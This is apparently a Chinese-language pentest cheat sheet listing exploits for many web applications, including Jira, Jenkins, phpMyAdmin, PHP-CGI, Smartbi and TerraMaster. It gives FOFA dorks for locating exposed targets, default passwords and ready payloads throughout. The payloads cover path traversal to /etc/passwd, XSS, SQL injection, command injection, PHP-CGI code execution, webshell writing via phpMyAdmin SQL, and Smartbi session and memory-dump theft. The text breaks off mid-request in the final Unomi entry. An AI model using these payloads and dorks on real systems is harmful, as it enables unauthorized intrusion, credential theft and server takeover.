fofa : title="Apollo配置中心"
fofa : body="apollo-adminservice"

未授权访问

  • 相关文章

  • POC | Payload | exp

    # apollo-adminservice
    # 1. 获取所有的应用基本信息(包含 appId)
    xxx.xxx.xxx.xxx:8090/apps
    
    # apollo-adminservice
    # 2. 获取相关 appId 的所有 cluster
    xxx.xxx.xxx.xxx:8090/apps/<appId>/clusters
    
    # apollo-adminservice
    # 3. 获取相关 appId 的 namespaces
    xxx.xxx.xxx.xxx:8090/apps/<appId>/appnamespaces
    
    # apollo-configservice
    # 4. 组合 appId cluster namespaceName 获取配置 configurations
    xxx.xxx.xxx.xxx:8080/configs/<appId>/<cluster>/<namespaceName>
    

AppWeb

CVE-2018-8715 AppWeb认证绕过漏洞

  • 描述

    其7.0.3之前的版本中,对于 digest 和 form 两种认证方式,如果用户传入的密码为 null(也就是没有传递密码参数),appweb 将因为一个逻辑错误导致直接认证成功,并返回 session。

  • POC | Payload | exp


Appspace-Core

CVE-2021-27670

  • POC | Payload | exp
    /api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://xxxx.dnslog.cn
    

Bitbucket

CVE-2022-36804

Cacti

Fofa: app="cacti"

默认密码

admin   admin

CVE-2020-8813 Cacti v1.2.8 远程命令执行漏洞


celery

相关文章


Commvault

CVE-2021-34993


Confluence

官网 : https://www.atlassian.com/software/confluence

Confluence 是一个专业的企业知识管理与协同软件,也可以用于构建企业 wiki。使用简单,强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。

相关文章

相关工具

CVE-2019-3394 Confluence 文件读取漏洞

CVE-2019-3396 Confluence Wiki 远程代码执行

CVE-2019-3398 Atlassian Confluence Download Attachments Remote Code Execution

CVE-2021-26084

CVE-2021-26085

CVE-2022-26138

  • POC | Payload | exp
    disabledsystemuser
    disabled1system1user6708
    

Crowd

官网 : https://www.atlassian.com/software/crowd

Atlassian Crowd 是一套基于 Web 的单点登录系统。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能。Atlassian Crowd Data Center 是 Crowd 的集群部署版。

CVE-2019-11580 Atlassian Crowd 未授权访问漏洞

  • 描述

    Atlassian Crowd 和 Crowd Data Center 在其某些发行版本中错误地启用了 pdkinstall 开发插件,使其存在安全漏洞。攻击者利用该漏洞可在未授权访问的情况下对 Atlassian Crowd 和 Crowd Data Center 安装任意的恶意插件,执行任意代码/命令,从而获得服务器权限。

  • 影响版本

    • Atlassian Crowd 2.1.0 ~ 3.0.5
    • Atlassian Crowd 3.1.0 ~ 3.1.6
    • Atlassian Crowd 3.2.0 ~ 3.2.8
    • Atlassian Crowd 3.3.0 ~ 3.3.5
    • Atlassian Crowd 3.4.0 ~ 3.4.4
  • 相关文章

  • POC | Payload | exp


Django

CVE-2020-7471 Django StringAgg SQL Injection漏洞


DolphinScheduler

官网 : https://dolphinscheduler.apache.org/zh-cn/

Apache DolphinScheduler(目前处在孵化阶段)是一个分布式、去中心化、易扩展的可视化DAG工作流任务调度系统,其致力于解决数据处理流程中错综复杂的依赖关系,使调度系统在数据处理流程中开箱即用。

默认密码

admin dolphinscheduler

CVE-2020-13922 权限覆盖漏洞

  • POC | Payload | exp
    POST /dolphinscheduler/users/update
    id=1&userName=admin&userPassword=Password1!&tenantId=1&email=sdluser%40sdluser.sdluser&phone=
    

flask


FlySpray

官网 : http://www.flyspray.org/

XSRF Stored FlySpray 1.0-rc4 (XSS2CSRF add admin account)


GateOne

Fofa : app="GateOne"

相关文章

CVE-2020-20184 rce

  • POC | Payload | exp
    GateOne.ws.send('{"terminal:ssh_get_host_fingerprint":{"host":"目标IP","port":"22;cat /etc/passwd;"}}')
    

CVE-2020-35736 GateOne 路径遍历漏洞

  • POC | Payload | exp
    /auth?next=%2F
    /downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
    

Gerapy

相关文章

CVE-2021-32849


Gitea

https://gitea.io/

Gitea 1.4.0 目录穿越导致命令执行漏洞


GitLab

https://about.gitlab.com/install/

GitLab 的漏洞情报参考 https://gitlab.com/gitlab-org/cves/-/tree/master

CVE-2020-10977 GitLab 任意文件读取漏洞

CVE-2021-4191

CVE-2021-22205

CVE-2021-22214

CVE-2022-2185

CVE-2022-2884

  • 影响范围
    11.3.4 <= GitLab CE/EE < 15.1.5
    15.2 <= GitLab CE/EE < 15.2.3
    15.3 <= GitLab CE/EE < 15.3.1

glpi

项目地址: https://github.com/glpi-project/glpi
fofa: app="TECLIB-GLPI"

CVE-2022-35914 GLPI htmLawedTest.php 远程命令执行漏洞


GoAhead

CVE-2017-17562

CVE-2021-42342


GoCD

未授权路径穿越


Gogs

相关工具

CVE-2018-18925

CVE-2018-20303


Grafana

fofa: app="Grafana"

默认用户名密码

  • admin/admin

Grafana 6.4.3 Arbitrary File Read

CVE-2020-13379

CVE-2021-41174

CVE-2021-43798

8.x . CSRF


GraphQL

相关文章

相关工具

相关案例

相关靶场

  • dolevf/Damn-Vulnerable-GraphQL-Application - Damn Vulnerable GraphQL Application is an intentionally vulnerable implementation of Facebook's GraphQL technology, to learn and practice GraphQL Security.
    git clone https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application.git && cd Damn-Vulnerable-GraphQL-Application
    docker build -t dvga .
    docker run -t -p 5013:5013 -e WEB_HOST=0.0.0.0 dvga
    
  • righettod/poc-graphql - Research on GraphQL from an AppSec point of view.

introspection/自省

Introspection is the ability to query which resources are available in the current API schema. Given the API, via introspection, we can see the queries, types, fields, and directives it supports.

由于自省机制,默认情况下,任何未经身份验证的用户都可以分析 GrapQL 模式。Introspection 允许我们获取有关所有请求、mutation、订阅和数据类型的信息,以及向发出请求的客户端提供的所有其他信息。通过请求 ___schema 元字段可以轻松获得此信息,根据规范,该信息始终可用于“root”类型的查询。

Content-Type: application/json

{"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}

Harbor

官网 : https://goharbor.io/

Harbor 的漏洞情报参考 https://github.com/goharbor/harbor/security/advisories

相关文章

CVE-2019-3990 User Enumeration Vulnerability

  • https://github.com/goharbor/harbor/security/advisories/GHSA-6qj9-33j4-rvhg

  • 描述

    攻击者可通过 Harbor API 的逻辑漏洞,进行用户名枚举操作

  • 影响版本

    • harbor 1.7.0 ~ 1.7.6
    • harbor 1.8.0 ~ 1.8.5
    • harbor 1.9.0 ~ 1.9.1
  • POC | Payload | exp

    GET /api/users/search?email=@test
    .com
        => {"code":400,"message":"username is required"}
    
    GET /api/users/search?username=t
        => User Enumeration
    

CVE-2019-16097 任意管理员注册漏洞

CVE-2019-19030

CVE-2020-13788 ssrf

  • 描述

    harbor 的 "Test Endpoint" API 在设计上存在脆弱性,可能会导致攻击者使用此 API 对 Harbor 服务器内部网络主机上开放的 TCP 端口进行扫描,从而使攻击者能够对内网资产进行探测。

  • POC | Payload | exp

CVE-2020-13794

CVE-2020-29662


HFS

HFS远程命令执行漏洞

  • 描述

    Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的‘findMacroMarker’函数中存在安全漏洞,该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的‘%00’序列利用该漏洞执行任意程序。

  • 案例

  • POC | Payload | exp

    /?search==%00{.exec|cmd.exe /c [Command-String].}
    

Horde_Groupware_Webmail

Horde Groupware Webmail Edition 远程命令执行

  • 描述

    Horde Groupware Webmail 是美国 Horde 公司的一套基于浏览器的企业级通信套件。 Horde Groupware Webmail 中存在代码注入漏洞。该漏洞源于外部输入数据构造代码段的过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流。

  • POC | Payload | exp


HUE

命令执行漏洞

  • POC | Payload | exp
    Hue 后台编辑器存在命令执行漏洞,攻击者通过编辑上传 xxx.sh 文件即可达到命令执行的目的
    

ixcache

FOFA:title="iXCache"

默认口令

admin
ixcache

jellyfin

fofa: title="jellyfin"

CVE-2020-26948 ssrf

  • 描述

    Emby Server 4.5.0之前的版本允许通过Items/RemoteSearch/Image ImageURL参数进行SSRF。

  • POC | Payload | exp

CVE-2021-21402

CVE-2021-29490

  • POC | Payload | exp
    /Images/Remote?imageUrl=<URL>
    /Items/RemoteSearch/Image?ImageUrl=<URL>&ProviderName=TheMovieDB
    

Jenkins

官网 : https://jenkins.io/

app="Jenkins"

Jenkins 的漏洞情报参考 https://jenkins.io/security/advisories/

搭建教程

相关文章

资源

相关工具

未授权访问漏洞

  • 描述

    默认情况下 Jenkins 面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

  • 相关文章

  • 利用

    http://[ip]:8080/manage

CVE-2017-1000353 未授权远程代码执行漏洞

  • 描述

    Jenkins 未授权远程代码执行漏洞, 允许攻击者将序列化的 Java SignedObject 对象传输给 Jenkins CLI 处理,反序列化 ObjectInputStream 作为 Command 对象,这将绕过基于黑名单的保护机制, 导致代码执行。

  • 影响版本

    • jenkins < 2.56
  • POC | Payload | exp

CVE-2018-1000861 远程命令执行漏洞

  • 描述

    Jenkins 使用 Stapler 框架开发,其允许用户通过 URL PATH 来调用一次 public 方法.由于这个过程没有做限制,攻击者可以构造一些特殊的 PATH 来执行一些敏感的 Java 方法.

    通过这个漏洞,我们可以找到很多可供利用的利用链.其中最严重的就是绕过 Groovy 沙盒导致未授权用户可执行任意命令:Jenkins 在沙盒中执行 Groovy 前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过 Meta-Programming 的方式,在检查这个步骤时执行任意命令.

  • 影响版本

    • jenkins < 2.153
  • POC | Payload | exp

CVE-2018-1999001 配置文件路径改动导致管理员权限开放漏洞

  • 描述

    Jenkins 官方在 7 月 18 号发布了安全公告,对 Jenkins 的两个高危漏洞进行通告,其中包括配置文件路径改动导致管理员权限开放的漏洞 CVE-2018-1999001,未授权用户通过发送一个精心构造的登录凭据,能够致使匿名用户获取 Jenkins 的管理权限。

  • 影响版本

    • jenkins < 2.121.1
    • jenkins 2.122 ~ 2.132
  • 相关文章

CVE-2018-1999002 任意文件读取漏洞

CVE-2019-1003000 未授权访问 RCE 漏洞

CVE-2019-10320 CloudBees Jenkins Credentials Plugin 信息泄露漏洞

  • 描述

    CloudBees Jenkins(Hudson Labs)是美国CloudBees公司的一套基于Java开发的持续集成工具。该产品主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。Credentials Plugin 是使用在其中的一个身份凭据存储插件。 Jenkins Credentials Plugin 2.1.18 及之前版本中存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。

  • 影响版本

    • jenkins < 2.1.18
  • 相关文章

CVE-2019-10392 RCE with Git Client Plugin 2.8.2 (Authenticated)


Jira

官网 : https://www.atlassian.com/software/jira

JIRA 是 Atlassian 公司出品的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。

jira 的漏洞情报参考 https://jira.atlassian.com/browse/JRASERVER-69858?filter=13085

相关工具

CVE-2017-9506 ssrf

  • POC | Payload | exp
    /plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD>
    

CVE-2018-20824 xss

  • POC | Payload | exp
    /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
    

CVE-2019-3402 xss

  • POC | Payload | exp
    /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
    

CVE-2019-3403 信息泄露(用户名枚举)

  • 描述

    Atlassian Jira 7.13.3 之前版本、8.0.4 之前版本和 8.1.1 之前版本中存在用户名枚举漏洞,攻击者可利用该漏洞枚举用户名称。

  • 影响版本

    • Atlassian Jira < 7.13.3
    • Atlassian Jira 8.0.0 ~ 8.0.4
    • Atlassian Jira 8.1.0 ~ 8.1.1
  • POC | Payload | exp

CVE-2019-8442 Jira 未授权敏感信息泄露

  • 描述

    Atlassian Jira 是澳大利亚 Atlassian 公司的一套缺陷跟踪管理系统. 该系统主要用于对工作中各类问题、缺陷进行跟踪管理. Atlassian Jira 7.13.4 之前版本、8.0.4 之前版本和 8.1.1 之前版本中的 CachingResourceDownloadRewriteRule 类存在安全漏洞. 远程攻击者可利用该漏洞访问 Jira webroot 中的文件.

  • 影响版本

    • Atlassian Jira < 7.13.3
    • Atlassian Jira 8.0.0 ~ 8.0.4
    • Atlassian Jira 8.1.0 ~ 8.1.1
  • POC | Payload | exp

CVE-2019-8444 存储型 XSS

  • 描述

    Atlassian Jira 7.13.6之前版本和8.3.2之前的8.x版本中的 wikirenderer 组件存在跨站脚本漏洞。该漏洞源于 WEB 应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。

  • 影响版本

    • Atlassian Jira 7.7 ~ 7.13.6
    • Atlassian Jira 8.0.0 ~ 8.3.2
  • POC | Payload | exp

    POST /rest/api/2/issue/TEST-7/comment HTTP/1.1
    Content-Type: application/json
    
    {"body":"!image.png|width=\\\" οnmοuseοver=alert(333);//!"}
    

CVE-2019-8446 信息泄露(用户名枚举)

CVE-2019-8449

  • POC | Payload | exp

CVE-2019-8451 Jira 未授权 SSRF 漏洞

  • 描述

    Atlassian Jira 8.4.0 之前版本中的 /plugins/servlet/gadgets/makeRequest 资源存在代码问题漏洞。该漏洞源于网络系统或产品的代码开发过程中存在设计或实现不当的问题。

  • 影响版本

    • Atlassian Jira 7.6.0 ~ 8.4.0
  • POC | Payload | exp

CVE-2019-11581 Atlassian Jira 模板注入漏洞

  • 描述

    Atlassian Jira 多个版本前存在利用模板注入执行任意命令

  • 影响版本

    • Atlassian Jira 4.4 ~ 7.6.14
    • Atlassian Jira 7.7.0 ~ 7.13.5
    • Atlassian Jira 8.0.0 ~ 8.0.3
    • Atlassian Jira 8.1.0 ~ 8.1.2
    • Atlassian Jira 8.2.0 ~ 8.2.3
  • 相关文章

CVE-2020-14179 Information Disclosure

  • POC | Payload | exp
    /secure/QueryComponent!Default.jspa
    

CVE-2020-14181 User Enumeration

  • POC | Payload | exp
    /secure/ViewUserHover.jspa?username=<USERNAME>
    

CVE-2020-36289

  • POC | Payload | exp
    /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
    

CVE-2021-26086

  • 相关文章

  • 影响版本

    • Atlassian Jira < 8.5.14
    • Atlassian Jira 8.6.0 ~ 8.13.6
    • Atlassian Jira 8.14.0 ~ 8.16.1
  • POC | Payload | exp

    /s/cfx/_/;/WEB-INF/web.xml
    /s/cfx/_/;/WEB-INF/decorators.xml
    /s/cfx/_/;/WEB-INF/classes/seraph-config.xml
    /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
    /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
    /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
    /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
    

CVE-2021-43947

CVE-2022-26135 Atlassian Jira Mobile Plugin SSRF


JumpServer

JumpServer远程执行漏洞

Jupyter

官网 : https://jupyter.org/

Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。

未授权访问漏洞

  • 描述

    如果管理员未为 Jupyter Notebook 配置密码,将导致未授权访问漏洞,游客可在其中创建一个 console 并执行任意 Python 代码和命令。

  • 示例

    http://[ip]:8888


Kibana

CVE-2018-17246 Kibana Local File Inclusion

CVE-2019-7609


KodExplorer

fofa: app="Powered-by-KodExplorer"
fofa: icon_hash="1636007688"

kodexplorer 4.32 SSRF漏洞

  • POC | Payload | exp
    /index.php?app/getUrlTitle&url=192.168.1.1
    
    # 通过返回的时间判断是否存活
    

Reflected xss

svg ssrf

  • POC | Payload | exp
    <?xml version="1.0" encoding="UTF-8" standalone="no"?>
    <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style="overflow: hidden; position: relative;" width="300" height="200">
    <image x="10" y="10" width="276" height="110" xlink:href="http://127.0.0.1:8000/svg" stroke-width="1" id="image3204" />
    <rect x="0" y="150" height="10" width="300" style="fill: black"/>
    </svg>
    

svg xss

  • POC | Payload | exp
    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graph
    ics/SVG/1.1/DTD/svg11.dtd">
    
    
    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg
    ">
    <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width
    :3;stroke:rgb(0,0,0)" />
    <script type="text/javascript">
        alert(document.domain);
    </script>
    </svg>
    

Konga

Konga任意用户登录


MetaBase

fofa: app="Metabase"

CVE-2021-41277 MetaBase任意文件读取漏洞


MinIO

fofa: app="MinIO-Console"

CVE-2021-21287 MinIO未授权SSRF漏洞

CVE-2021-41266


Moodle

fofa: app="moodle"

CVE-2021-36393

CVE-2021-36394

CVE-2021-40691

CVE-2022-0332


Nagios

CVE-2022-29272


Nexus

官网 : https://www.sonatype.com/product-nexus-repository

默认密码

admin   admin123

CVE-2019-7238 Nexus Repository Manager 3 Remote Code Execution without authentication < 3.15.0

CVE-2020-10199/CVE-2020-10204

CVE-2020-29436


NiFi

Fofa: "nifi" && title=="NiFi"

NiFi 未授权

  • POC | Payload | exp
    /nifi/
    /nifi-api/flow/current-user
    /nifi-api/flow/process-groups/root
    /nifi-api/access/config
    

NiFi Api 远程代码执行


nodejs


noVNC

官网 : https://novnc.com

CVE-2017-18635 xss


nps

nps认证绕过漏洞


OFBiz

Fofa: app="Apache_OFBiz"

CVE-2020-9496 Ofbiz反序列化漏洞

CVE-2021-26295 RMI反序列化漏洞

CVE-2021-29200 Apache OFBiz RMI Bypass RCE

CVE-2021-30128


OpenAM

fofa: app="OpenAM"

CVE-2021-29156

CVE-2021-35464


phpMyAdmin

官网: https://www.phpmyadmin.net/

搭建教程

相关文章

通过 phpmyadmin 来 getshell

  • 确认绝对路径

    利用 log 变量,猜绝对路径

    或者直接查询 select @@basedir;

    直接 SQL 写文件 select '<?php phpinfo(); ?>' INTO OUTFILE 'C:/phpStudy/PHPTutorial/WWW/a.php';

    如果 file_priv 为 null,那么是写不了的,可以尝试使用日志写马

    set global general_log='on';
    set global general_log_file='C:/phpStudy/PHPTutorial/WWW/a.php';
    select '<?php phpinfo(); ?>';
    set global general_log=off;
    

    参考 : phpMyAdmin新姿势getshell

CVE-2016-5734 4.0.x—4.6.2 远程代码执行漏洞

  • 描述

    phpMyAdmin 中存在安全漏洞,该漏洞源于程序没有正确选择分隔符来避免使用 preg_replacee 修饰符。远程攻击者可借助特制的字符串利用该漏洞执行任意 PHP 代码。以下版本受到影响:phpMyAdmin4.0.10.16之前4.0.x版本,4.4.15.7之前4.4.x版本,4.6.3之前4.6.x版本。

  • 影响版本

    • phpmyadmin 4.0.0 ~ 4.0.10.15
    • phpmyadmin 4.4.0 ~ 4.4.15.6
    • phpmyadmin 4.6.0 ~ 4.6.2
  • POC | Payload | exp

phpMyAdmin 4.7.x CSRF

CVE-2018-12613 4.8.x 本地文件包含漏洞利用

CVE-2019-6799

CVE-2019-12922 4.9.0.1 CSRF

  • 描述

    phpMyAdmin 4.9.0.1 版本中存在跨站请求伪造漏洞。该漏洞源于 WEB 应用未充分验证请求是否来自可信用户。攻击者可利用该漏洞通过受影响客户端向服务器发送非预期的请求。

  • 影响版本

    • phpmyadmin 4.9.0.1
  • POC | Payload | exp

CVE-2019-18622 xss

CVE-2020-26935 phpmyadmin后台SQL注入

  • POC | Payload | exp
    /tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1)
    

CVE-2022-23808 phpMyAdmin 5.1.1 - XSS (Cross-site Scripting)


PHP

CVE-2012-1823 PHPCGI 远程代码执行漏洞

  • 描述

    5.3.12 之前和 5.4.2 之前的 5.4.x 中的 sapi/cgi/cgi_main.c 在配置为 CGI 脚本(aka php-cgi)时,不能正确处理缺少=(等号)字符的查询字符串 ,它允许远程攻击者通过在查询字符串中放置命令行选项来执行任意代码,这与在"d"情况下缺少跳过某些 php_getopt 有关。

  • 影响版本

    • php < 5.3.12
    • php < 5.4.2
  • 相关文章

  • POC | Payload | exp

    来源: https://vulhub.org/#/environments/php/CVE-2012-1823/

    http://你的 IP 地址:端口号/index.php?-s 即爆出源码

    发送如下数据包,可见 Body 中的代码已被执行:

    POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: example.com
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 31
    
    <?php echo shell_exec("id"); ?>
    
  • MSF Module

    use exploit/multi/http/php_cgi_arg_injection
    

CVE-2018-19518 PHP imap 远程命令执行漏洞

  • 描述

    php imap 扩展用于在 PHP 中执行邮件收发操作.其 imap_open 函数会调用 rsh 来连接远程 shell,而 debian/ubuntu 中默认使用 ssh 来代替 rsh 的功能 (也就是说,在 debian 系列系统中,执行 rsh 命令实际执行的是 ssh 命令) .

    因为 ssh 命令中可以通过设置 -oProxyCommand= 来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞.

  • 影响版本

    • php 5.6.0 ~ 5.6.38
    • php 7.0.0 ~ 7.0.32
    • php 7.1.0 ~ 7.1.24
    • php 7.2.0 ~ 7.2.12
  • POC | Payload | exp

LFI with phpinfo

  • 描述

    PHP 文件包含漏洞中,如果找不到可以包含的文件,我们可以通过包含临时文件的方法来 getshell.因为临时文件名是随机的,如果目标网站上存在 phpinfo,则可以通过 phpinfo 来获取临时文件名,进而进行包含.

  • POC | Payload | exp

PHP 环境 XML 外部实体注入漏洞 (XXE)

XDebug 远程调试漏洞 (代码执行)


PHP-FPM

PHP-FPM 是一个 PHPFastCGI 管理器,对于 PHP 5.3.3 之前的 php 来说,是一个补丁包 ,旨在将 FastCGI 进程管理整合进 PHP 包中。

PHP-FPM Fastcgi 未授权访问漏洞

CVE-2019-11043 PHP-FPM 远程代码执行漏洞

PHPUnit

CVE-2017-9841 eval-stdin.php 远程命令执行漏洞

  • 相关文章

  • POC | Payload | exp

    curl --data "<?php print str_rot13('V pna erzbgryl rkrphgr CUC pbqr ba lbhe freire');" http://localhost:8080/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
    

PHPMailer

CVE-2017-5223 任意文件读取漏洞


Portainer

fofa: app="portainer"

相关文章


Prometheus

fofa: app="Prometheus-Time-Series-Collection-and-Processing-Server"

相关文章


rConfig

fofa: app="rConfig"

rConfig 3.9.6 rce


ResourceSpace

fofa: app="ResourceSpace"

CVE-2015-3648

  • POC | Payload | exp
    /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
    

CVE-2021-41765

CVE-2021-41950

CVE-2021-41951


SaltStack

fofa: app="SALTSTACK-产品"

CVE-2020-11651 SaltStack认证绕过

CVE-2020-16846/25592

CVE-2021-25281/25282/25283


SAP

fofa: app="SAP-Web-Application-Server"

相关资源

CVE-2018-2380 SAP NetWeaver AS JAVA CRM Remote Command Execution via Log injection

CVE-2020-6207 SAP Solution Manager RCE

CVE-2020-6287

CVE-2020-6308

  • 描述

    SAP BusinessObjects Business Intelligence平台(Web服务)版本-410、420、430允许未经身份验证的攻击者注入任意值作为CMS参数,以在内部网络上执行查找,否则将无法从外部访问该内部网络

  • POC | Payload | exp

    /AdminTools/querybuilder/logon?framework=
    
    aps=xxx.dnslog.cn&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
    

Sentinel

项目地址: https://github.com/alibaba/Sentinel

sentinel-dashboard ssrf


SharePoint

CVE-2022-29108


ShenYu

fofa: body="id="httpPath"" && body="th:text="${domain}""

CVE-2021-37580 Apache ShenYu Admin 身份验证绕过漏洞

CVE-2021-45029 Apache ShenYu Groovy&SpEL表达式注入漏洞


ShowDoc

fofa: app="ShowDoc"

ShowDoc 前台任意文件上传


SkyWalking

fofa: app="APACHE-Skywalking"

Apache Skywalking <=8.3 SQL注入


Smartbi

fofa: app="SMARTBI"

常见口令

  • demo/demo
  • manager/demo
  • admin/admin
  • admin/manager
  • admin/2manager

相关文章

Tips

任意文件读取

  • POC | Payload | exp
    /vision/FileServlet?ftpType=out&path=upload/../../../../../../../../../../etc/passwd&name=%E4%B8%AD%E5%9B%BD%E7%9F%B3%E6%B2%B9%E5%90%89%E6%9E%97%E7%99%BD%E5%9F%8E%E9%94%80%E5%94%AE%E5%88%86%E5%85%AC%E5%8F%B8XX%E5%8A%A0%E6%B2%B9%E7%AB%99%E9%98%B2%E9%9B%B7%E5%AE%89%E5%85%A8%E5%BA%94%E6%80%A5%E9%A2%84%E6%A1%88.docx
    

wsdl泄露

  • POC | Payload | exp
    /vision/services/CatalogService?wsdl
    SimpleReportService 提供灵活报表相关操作功能 https://127.0.0.1/vision/services/SimpleReportService?wsdl
    BusinessViewService 提供数据集定义相关操作功能 https://127.0.0.1/vision/services/BusinessViewService?wsdl
    DataSourceService 提供数据源相关操作功能 https://127.0.0.1/vision/services/DataSourceService?wsdl
    AnalysisReportService 提供多维分析相关操作功能 https://127.0.0.1/vision/services/AnalysisReportService?wsdl
    UserManagerService 提供用户相关操作,包括:读取/维护用户信息、读取/维护组信息、读取/维护角色信息、为用户和组分配角色等 https://127.0.0.1/vision/services/UserManagerService?wsdl
    

后台目录遍历

  • POC | Payload | exp
    /vision/chooser.jsp?key=CONFIG_FILE_DIR&root=C%3A%2F
    
    /vision/monitor/sysprops.jsp
    /vision/monitor/getclassurl.jsp?classname=smartbi.freequery.expression.ast.TextNode
    /vision/monitor/hardwareinfo.jsp
    

后台 session 窃取

  • POC | Payload | exps
    /vision/monitor/listsessions.jsp        # 查看session
    

后台内存 dump

  • POC | Payload | exp
    /vision/monitor/heapdump.jsp            # 缓存抓取密码,使用Eclipse Memory Analyzer解析内存文件
    /vision/monitor/heapdump.jsp?dumpbin=true
    

后台SSRF

  • POC | Payload | exp
    /vision/monitor/testmailserver.jsp
    

SolarWinds

CVE-2020-10148

CVE-2021-35215


SonarQube

fofa: app="sonarQube-代码管理"

管理员密码默认为admin/admin

相关文章

CVE-2020-27986


Supervisord

项目地址 : https://github.com/Supervisor/supervisor

搭建教程

测试链接

  • http://[ip]:9001

CVE-2017-11610 Supervisord 远程命令执行漏洞


TerraMaster-TOS

相关文章

CVE-2020-15568 exportUser.php 远程命令执行

  • POC | Payload | exp
    http://xxx.xxx.xxx.xxx/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)>1.txt
    http://xxx.xxx.xxx.xxx/include/1.txt
    

CVE-2020-28185 用户枚举漏洞

CVE-2020-28186 任意账号密码修改漏洞

CVE-2020-28187 后台任意文件读取漏洞

  • POC | Payload | exp
    /tos/index.php?editor/fileGet&filename=../../../../../../etc/passwd
    

CVE-2020-28188 upload

CVE-2022-24990 createRaid 远程命令执行


trojan多用户管理部署程序

相关文章

命令注入漏洞

默认 jwt 密钥


TRS_WAS

Fofa: body="/was5/"

TRS(拓尔思)WCM任意文件上传漏洞

  • 描述

    file_upload.html 未做访问限制,攻击者可以匿名访问上传页面进行文件上传操作。

  • 影响版本

    • WCM5.2
    • WCM6.1
  • POC | Payload | exp

    xxx.com/file/file_upload.html、infogate/file/file_upload.html
    

TRS(拓尔思)WAS 4.5 SQL注入漏洞

  • 描述

    rss.jsp 页面 "channelid" 参数未进行过滤

  • 影响版本

    • WAS 4.5
  • POC | Payload | exp

    /wcm/help/wcmhelp_list.jsp?trandom=0.3575719151171357&JspUrl=http://xxx/wcm/#/loginpage.jsp' and (select top 1 username+char(124)+password from wcmuser)>0--
    

CNVD-2020-27769 拓尔思TRSWAS_5.0任意文件读取

  • 描述

    该漏洞成因为 web/tree 接口 treefile 参数存在文件读取漏洞,可读取数据库配置文件、账户密码等信息,导致配置文件信息泄露威胁网站安全。

  • 影响版本

    • TRSWAS_5.0
  • POC | Payload | exp

    http://xxx.com/was5/web/tree?treefile=/WEB-INF/classes/com/trs/was/resource/wasconfig.properties
    

Unomi

Fofa: title="Unomi"

CVE-2020-13942 rce

  • POC | Payload | exp
    POST /context.json HTTP/1.1
    Host: x.x.x.x
    Connection: close
    Pragma: no-cache
    Cache-Control: no-cache
    sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
